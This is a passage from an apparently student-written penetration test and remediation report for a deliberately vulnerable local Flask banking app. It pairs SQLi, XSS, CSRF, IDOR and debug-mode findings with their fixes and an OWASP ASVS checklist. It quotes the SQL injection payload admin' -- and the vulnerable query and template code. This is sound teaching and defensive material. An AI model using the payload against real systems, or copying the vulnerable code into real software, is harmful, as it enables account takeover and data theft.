      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shortener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or embed it in a phishing email targeting 8TechBank customers. When an authenticated victim clicks the link, their browser executes the script, silently transmitting their session cookie to the attacker. The attacker then uses the stolen cookie to impersonate the victim as described in Finding 3 above. Unlike stored XSS, this attack requires the victim to click a crafted link, making it a one-time targeted attack rather than a persistent one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8 Finding </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8 - Debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mode Enabled (Medium, CVSS 5.3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The application was configured with app.run(debug=True), enabling Flask's interactive debugger on any unhandled exception. This provides a browser-based Python REPL with full server access to any attacker who triggers an application error. Business impact: arbitrary code execution on the server. Status: Fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9 Finding </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9 - Missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Secure Session Configuration (Medium, CVSS 5.4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>No session cookie security flags were configured. The absence of HttpOnly allows JavaScript to read the session cookie, amplifying XSS attacks. The absence of SameSite=Strict allows cross-site request forgery. The absence of a session timeout allows stolen cookies to remain valid indefinitely. Business impact: amplified impact of XSS and CSRF vulnerabilities. Status: Fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="1" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. Remediation Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1 - Parameterized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Queries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Vulnerable code (app.py line 79):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Secure code (src/secure/app.py):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>user = db.execute("SELECT * FROM users WHERE username=?", (username,)).fetchone()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Verification: The payload admin' -- now returns Invalid credentials on the secure app as shown in fix-1-sqli-blocked.png.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 - Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Encoding and Content Security Policy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Vulnerable code: return f"&lt;h2&gt;Search Results for: {query}&lt;/h2&gt;" and {{ tx.note | safe }} in templates.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Secure code: query = escape(request.args.get('q', '')) with return render_template('search.html', query=query), and {{ tx.note }} without the safe filter in all templates.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>A Content-Security-Policy header was added blocking inline script execution: script-src 'self'. Verification: The XSS payload is displayed as visible text in fix-2-xss-blocked.png.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3 - CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Token Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Vulnerable code: No CSRF validation on /transfer POST route.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Secure code: csrf = CSRFProtect(app) initialised globally. Every state-changing form includes &lt;input type="hidden" name="csrf_token" value="{{ csrf_token() }}"&gt;. Flask-WTF validates the token on every POST request automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Verification: The malicious CSRF page now returns 400 Bad Request </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The CSRF token is missing as shown in fix-3-csrf-blocked.png.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4 - Authorization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Vulnerable code: No ownership check on /account/&lt;id&gt; route.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Secure code: if account['user_id'] != session['user_id']: abort(403) added immediately after fetching the account record.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Verification: Accessing /account/2 while logged in as </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Alice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> now returns 403 Forbidden as shown in fix-4-idor-blocked.png.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5 - bcrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Password Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Vulnerable code: Passwords stored as plaintext strings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Secure code: At registration: hashed = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12)). At login: bcrypt.checkpw(password.encode(), user['password'].encode()).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Verification: The admin panel now shows </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[bcrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>hash - not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>shown]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> for all users as shown in fix-5-bcrypt-passwords.png.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6 - Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Headers and Session Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Secure code added to @app.after_request decorator: X-Content-Type-Options: nosniff, X-Frame-Options: DENY, Referrer-Policy: no-referrer, Strict-Transport-Security: max-age=31536000, Content-Security-Policy blocking inline scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Session configuration: SESSION_COOKIE_HTTPONLY = True, SESSION_COOKIE_SAMESITE = Strict, PERMANENT_SESSION_LIFETIME = timedelta(minutes=15).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Verification: All headers visible in browser Developer Tools as shown in fix-6-security-headers.png.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="1" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5. OWASP ASVS Level 1 Compliance Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The following matrix maps the 8TechBank secure application against OWASP Application Security Verification Standard (ASVS) v4.0.3 Level 1 requirements. Level 1 represents the minimum baseline for any application handling sensitive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141"/>
        <w:gridCol w:w="2769"/>
        <w:gridCol w:w="1011"/>
        <w:gridCol w:w="3553"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A1776E">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ASVS ID</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Category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Requirement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Status</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Notes</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V2.1.1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Auth</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Verify passwords of at least 8 characters are accepted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Enforced via maxlength</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V2.4.1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Auth</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Passwords stored using bcrypt, scrypt, or Argon2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bcrypt 12 rounds</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V2.7.1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Auth</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Authentication credentials not transmitted in clear text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E36C09"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Partial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HTTP used locally; HTTPS needed in production</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V3.4.1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Cookie-based session tokens use HttpOnly flag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SESSION_COOKIE_HTTPONLY=True</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V3.4.2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Cookie-based session tokens use Secure flag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E36C09"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Partial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Disabled for localhost; enable in production</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V3.4.3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Cookie-based session tokens use SameSite attribute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SameSite=Strict</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V3.3.1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Logout invalidates session tokens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session.clear() on logout</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V3.3.2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Session timeout of no more than 30 minutes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15-minute timeout configured</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V5.2.1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Validation</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 xml:space="preserve">Input validated against allowlist or </w:t>
            </w:r>
            <w:r w:rsidR="00E749B7">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sanitized</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> before use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Marshmallow schemas on API; escape() on web</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V5.3.1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Encoding</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Output encoding performed for HTML context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Jinja2 auto-escaping; no safe filter</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lastRenderedPageBreak/>
              <w:t>V5.3.4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Encoding</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Data selection or database queries use parameterized queries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All queries use ? placeholders</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V4.1.1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Access</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Access controls enforced on the server side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Ownership check on /account/&lt;id&gt;</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V4.2.1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Access</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CSRF tokens used on all state-changing requests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Flask-WTF CSRFProtect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A1776E">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V14.4.1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Headers</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HTTP security headers present on all responses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b/>
                <w:bCs/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pass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X-Frame-Options, CSP, HSTS, nosniff all present</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="200" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Summary: 12 Pass, 2 Partial, 0 Fail out of 14 controls assessed. The two Partial items relate to HTTPS not being configured for the local development environment. In a production deployment both would be resolved by placing the application behind an Nginx reverse proxy with a valid TLS certificate, which is described in the sandboxing design document.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Recommended actions to achieve full Level 1 compliance: deploy behind Nginx with TLS, set SESSION_COOKIE_SECURE = True, add rate limiting to all authentication endpoints, and implement account lockout after repeated failed login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="1" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6. Appendices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix A </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Complete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerability Assessment Matrix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>See vulnerability_assessment_matrix.docx in the report/ folder for the full detailed matrix with CWE identifiers, OWASP categories, file and line numbers, CVSS v3.1 scores, security impact descriptions, and remediation guidance for all nine vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B - Evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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1776E">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Filename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A1776E" w:rsidRDefault="009C14D2">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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exploit-a-1-sqli-payload.png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SQLi payload admin' -- entered in login form</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exploit-a-1-sqli-bypass.png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Dashboard showing successful login via SQLi</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exploit-a-2-union-payload.png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UNION-based SQLi payload in login form</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exploit-a-2-union-result.png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Successful UNION-based login bypass</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exploit-b-1-reflected-xss-alert.png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Reflected XSS alert showing session cookie</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exploit-b-1-reflected-xss-result.png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Search page after XSS execution</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exploit-b-2-stored-xss-payload.png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XSS payload entered in transfer note field</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exploit-b-2-stored-xss-alert.png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Stored XSS firing on dashboard load</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lastRenderedPageBreak/>
              <w:t>exploit-c-csrf-before.png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Alice's balance before CSRF attack</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exploit-c-csrf-after.png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 xml:space="preserve">Alice's balance after CSRF attack </w:t>
            </w:r>
            <w:r w:rsidR="00E749B7">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> - </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> UGX 500 stolen</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exploit-d-1-idor-user-a.png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Alice viewing her own account</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exploit-d-2-idor-user-b.png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Alice viewing Bob's account via IDOR</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exploit-d-3-idor-admin.png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Alice viewing admin account via IDOR</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fix-1-sqli-blocked.png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SQLi payload rejected with Invalid credentials</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fix-2-xss-blocked.png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XSS payload rendered as plain text</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fix-3-csrf-blocked.png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CSRF attack returns 400 Bad Request</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fix-4-idor-blocked.png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IDOR attempt returns 403 Forbidden</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fix-5-bcrypt-passwords.png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Admin panel showing bcrypt hashes not plaintext</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fix-6-security-headers.png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Browser DevTools showing all security headers</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api-1-jwt-token.png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JWT token issued by /api/auth/token endpoint</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api-2-jwt-protected.png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Protected API endpoint returning account data</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api-3-rate-limit.png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429 Too Many Requests after 5 attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A1776E">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api-4-validation.png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1776E" w:rsidRDefault="009C14D2">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Marshmallow validation rejecting malformed input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C - Tool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Output Logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>All API test commands were executed using PowerShell Invoke-WebRequest against the locally running secure Flask application on http://127.0.0.1:5001. Exploit demonstrations were conducted using the browser address bar and manually crafted HTML files. No automated scanning tools were used. All testing was conducted exclusively against the locally hosted 8TechBank application in compliance with the assignment ethical use notice and Uganda's Computer Misuse Act, 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="1" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7. AI Tool Usage Declaration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF34B5" w:rsidRPr="00CF34B5" w:rsidRDefault="00CF34B5" w:rsidP="00CF34B5">
